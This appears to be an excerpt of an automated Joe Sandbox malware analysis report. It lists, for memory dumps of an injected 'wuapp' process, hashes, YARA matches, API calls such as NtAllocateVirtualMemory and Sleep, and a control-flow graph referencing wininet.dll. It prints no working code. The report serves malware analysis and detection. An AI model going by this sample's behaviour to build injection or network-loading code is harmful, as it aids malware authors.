                                                        • Opcode ID: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                                        • Instruction ID: ca19913c4145ae4f9aad6efc8169e3c4a99abf8a2bbff5c29675975ae4f5a00f
                                                        • Opcode Fuzzy Hash: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                                        • Instruction Fuzzy Hash: B6F0A4B2200208ABCB14DF99DC85EEB77ADAF8C754F118248BA0D97245D630E811CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00112D11,00002000,00003000,00000004), ref: 0012A4E9
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: dc16da0520ef190a3e8130b28335fede87111d9001cde4ac03091b5b427adf8d
                                                        • Instruction ID: 0aeb6ef558aa81bceff9fe8606a1d6ccd8037d8bda53d8cc90d1af36294164b1
                                                        • Opcode Fuzzy Hash: dc16da0520ef190a3e8130b28335fede87111d9001cde4ac03091b5b427adf8d
                                                        • Instruction Fuzzy Hash: EDF0F8B6210114AFDB14DF98DD81EEB77A9EF88354F118149FE59A7241C630E811CBE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00112D11,00002000,00003000,00000004), ref: 0012A4E9
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                                        • Instruction ID: a4e7422d8f3ac20b69194f42acfae16fa09eb01913eab41ad8d93e5edd72502b
                                                        • Opcode Fuzzy Hash: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                                        • Instruction Fuzzy Hash: DFF015B2210218ABDB14DF89DC81EAB77ADAF8C754F018108BE0897241C630F810CBB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtClose.NTDLL(00125940,00000206,?,00125940,00000005,FFFFFFFF), ref: 0012A425
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                                        • Instruction ID: d83c345c475b5c423e0729b2d9849c85169cf34b47ee2783d210f34fedd505dd
                                                        • Opcode Fuzzy Hash: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                                        • Instruction Fuzzy Hash: 2BD01772200214ABD720EB98EC89E9B7BACDF48660F018055BA485B242C630FA1086E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                        • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                        • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                        • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                        • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                        • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                        • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                        • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                        • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                        • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                        • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                        • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                        • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                        • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                        • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                        • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                        • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                        • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                        • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                        • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                        • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                        • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                        • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                        • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                        • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                        • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                        • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                        • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                        • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                        • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                        • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                        • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                        • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                        • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Basic blocks (node: address range, calls) and their successors:
                                                        • 300: 128ff0-129032, call 12be20 -> 303, 304
                                                        • 303: 129038-129088, call 12bef0, call 11a0e0, call 125a40 -> 312
                                                        • 304: 12910c-129112
                                                        • 312: 129090-1290a1, Sleep -> 313, 314
                                                        • 313: 1290a3-1290a9 -> 315, 316
                                                        • 314: 129106-12910a -> 304, 312
                                                        • 315: 1290d3-1290f4, call 128e20 -> 320
                                                        • 316: 1290ab-1290d1, call 128c20 -> 320
                                                        • 320: 1290f9-1290fc -> 314
                                                        APIs
                                                        • Sleep.KERNELBASE(000007D0), ref: 00129098
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: net.dll$wininet.dll
                                                        • API String ID: 3472027048-1269752229
